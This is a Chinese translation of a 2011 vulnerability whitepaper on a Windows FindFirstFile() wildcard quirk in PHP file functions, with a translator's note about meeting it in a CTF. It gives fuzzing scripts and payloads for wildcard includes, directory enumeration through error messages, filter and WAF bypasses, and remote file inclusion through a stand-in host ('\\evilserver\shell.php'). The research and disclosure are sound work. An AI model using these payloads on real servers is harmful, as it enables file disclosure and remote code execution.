1.開場白
此次所披露的是以下網頁中提出的問題所取得的測試結果:
http://code.google.com/p/pasc2at/wiki/SimplifiedChinese
<?php for ($i=0; $i<255; $i++) { $url = '1.ph' . chr($i); $tmp = @file_get_contents($url); if (!empty($tmp)) echo chr($i) . "\r\n"; } ?>
已知1.php存在,以上腳本訪問的結果是:
1.php 1.phP 1.ph< 1.ph>
都能得到返回。
前兩種能返回結果是總所周知的(因為windows的文件系統支持大小的互轉的機制),另外的兩種返回引起了我們的注意。
測試php版本:PHP4.9,PHP5.2,PHP5.3,PHP6.0
測試系統:WINXP SP3 X32,WINXP SP2 X64,WIN7,WIN2K3
經測試我們得出的結論是:該漏洞影響所有的windows+php版本
2.深入探查模糊測試的結果
為了繼續深入探查關於該bug的信息,我們對demo做了些許修改:
<?php for ($j=0; $i<256; $j++) { for ($i=0; $i<256; $i++) { $url = '1.p' . chr($j) . chr($i); $tmp = @file_get_contents($url); if (!empty($tmp)) echo chr($j) . chr($i) . "\r\n"; } } ?>
在調試php解釋器的過程中,我們將此“神奇”的漏洞歸結為一個Winapi 函數FindFirstFile()所產生的結果(http://msdn.microsoft.com/en-us/library/aa364418(v=vs.85).aspx).更好玩的是,當跟蹤函數調用棧的過程中我們發現字符”>”被替換成”?”,字符”<”被替換成”*”,而符號”(雙引號)被替換成一個”.”字符。這在2007年msdn公開的文檔中被提及:http://msdn.microsoft.com/en-us/library/community/history/aa364418%28v=vs.85%29.aspx?id=3
但是此bug至今未被任何windows旗下所發行的任何版本修復!
我們要闡明的是,該函數FindFirstFile()在php下的運用遠遠不至於file_get_contents().關於該bug可以利用的函數我們已經列了如下一表:
此外,我們還發現該利用也可以被運用到c++中,以下采用來自msdn的例子:
#include <windows.h> #include <tchar.h> #include <stdio.h> void _tmain(int argc, TCHAR *argv[]) { WIN32_FIND_DATA FindFileData; HANDLE hFind; if( argc != 2 ) { _tprintf(TEXT("Usage: %s [target_file]\n"), argv[0]); return; } _tprintf (TEXT("Target file is %s\n"), argv[1]); hFind = FindFirstFile(argv[1], &FindFileData); if (hFind == INVALID_HANDLE_VALUE) { printf ("FindFirstFile failed (%d)\n", GetLastError()); return; } else { _tprintf (TEXT("The first file found is %s\n"), FindFileData.cFileName); FindClose(hFind); } }
當傳入參數”c:\bo<”時,成功訪問到boot.ini文件。
3.利用方法總結
當調用FindFirstFile()函數時,”<”被替換成”*”,這意味該規則可以使”<”替換多個任意字符,但是測試中發現並不是所有情況都如我們所願。所以,為了確保能夠使”<”被替換成”*”,應當采用”<<”
EXAMPLE:include(‘shell<'); 或者include(‘shell<<'); //當文件夾中超過一個以shell打頭的文件時,該執行取按字母表排序後的第一個文件。
當調用FindFirstFile()函數時,”>”被替換成”?”,這意味這”>”可以替換單個任意字符
EXAMPLE:include(‘shell.p>p'); //當文件中超過一個以shell.p?p 通配時,該執行取按字母表排序後的第一個文件。
當調用FindFirstFile()函數時,”””(雙引號)被替換成”.”
EXAMPLE:include(‘shell”php'); //===>include(‘shell.php');
如果文件名第一個字符是”.”的話,讀取時可以忽略之
EXAMPLE:fopen(‘.htacess'); //==>fopen(‘htacess'); //加上第一點中的利用 ==>fopen(‘h<<');
文件名末尾可以加上一系列的/或者\的合集,你也可以在/或者\中間加上.字符,只要確保最後一位為”.”
EXAMPLE:fopen(“config.ini\\.// \/\/\/.”);==> fopen(‘config.ini\./.\.'); ==>fopen(‘config.ini/////.')==>fopen(‘config.ini…..') //譯者注:此處的利用我不是很理解,有何作用?截斷?
該函數也可以調用以”\\”打頭的網絡共享文件,當然這會耗費不短的時間。補充一點,如果共享名不存在時,該文件操作將會額外耗費4秒鐘的時間,並可能觸發時間響應機制以及max_execution_time拋錯。所幸的是,該利用可以用來繞過allow_url_fopen=Off 並最終導致一個RFI(遠程文件包含)
EXAMPLE:include (‘\\evilserver\shell.php');
用以下方法還可以切換文件的盤名
include(‘\\.\C:\my\file.php\..\..\..\D:\anotherfile.php');
選擇磁盤命名語法可以用來繞過斜線字符過濾
file_get_contents(‘C:boot.ini'); //==> file_get_contents (‘C:/boot.ini');
在php的命令行環境下(php.exe),關於系統保留名文件的利用細節
EXAMPLE:file_get_contents(‘C:/tmp/con.jpg'); //此舉將會無休無止地從CON設備讀取0字節,直到遇到eof
EXAMPLE:file_put_contents(‘C:/tmp/con.jpg',chr(0×07)); //此舉將會不斷地使服務器發出類似哔哔的聲音
4.更深入的利用方法
除了以上已經展示的方法,你可以用下面的姿勢來繞過WAF或者文件名過濾
請思考該例:
<?php file_get_contents("/images/".$_GET['a'].".jpg"); //or another function from Table 1, i.e. include(). ?>
訪問test.php?a=../a<%00
可能出現兩種結果
Warning: include(/images/../a<) [function.include]: failed to open stream:Invalid argument in。。。 Warning: include(/images/../a<) [function.include]: failed to open stream:Permission denied。。
如果是第一種情況,說明不存在a打頭的文件,第二種則存在。
此外,有記錄顯示,有時網站會拋出如下錯誤:
Warning: include(/admin_h1d3) [function.include]: failed to open stream: Permission denied..
這說明該文件夾下存在一個以上以a打頭的文件(夾),並且第一個就是admin_h1d3。
5.結論
實驗告訴我們,php本身沒有那麼多的漏洞,我們所看到是:過分的依賴於另一種程序語言(注:如文中的漏洞產自與winapi的一個BUG),並且直接強 制使用,將會導致細微的錯誤(bug),並最終造成危害(vul).這樣便拓寬了模糊測試的范疇(譯者注:並不僅僅去研究web層面,而深入到系統底層),並最終導致IDS,IPS的規則更新。誠然,代碼需要保護,需要補丁,需要升級與擴充。但是,這並不是我們真正要去關注的問題。在當下,我認為我們 更謹慎地去書寫更多更嚴厲的過濾規則,正如我們一直在做的一樣。任重道遠,精益求精。
因為這是基礎應用層的問題,所以我們猜想類似的問題可能出現在其他web應用中。於是我們還測試了mysql5,而實驗結果表明,mysql5並不存在類似的漏洞。但是我們仍認為:類似的漏洞將會出現在諸如Perl、Python、Ruby等解釋性語言上。
6.Referer
PHP application source code audits advanced technology: http://code.google.com/p/pasc2at/wiki/SimplifiedChinese MSDN FindFirstFile Function reference: http://msdn.microsoft.com/en-us/library/aa364418(v=vs.85).aspx MSDN comments history: http://msdn.microsoft.com/en-us/library/community/history/aa364418(v=vs.85).aspx?id=3 MSDN article «Naming Files, Paths, and Namespaces»: http://msdn.microsoft.com/en-us/library/aa365247(v=vs.85).aspx Technet article «Managing Files and Directories»: http://technet.microsoft.com/en-us/library/cc722482.aspx Paper «Technique of quick exploitation of 2blind SQL Injection»: http://www.exploit-db.com/papers/13696/
==================================================================
全文完。
注:該文是2011年底發表的一篇白皮書,至今該bug依然存在。我在幾個月前做CUIT的一個CTF時偶遇了一道該bug的利用,當時便是看的此文,當時只是粗粗讀了一下,寫了一個php的腳本去跑目錄。今回閒來無事,翻譯整理了一番。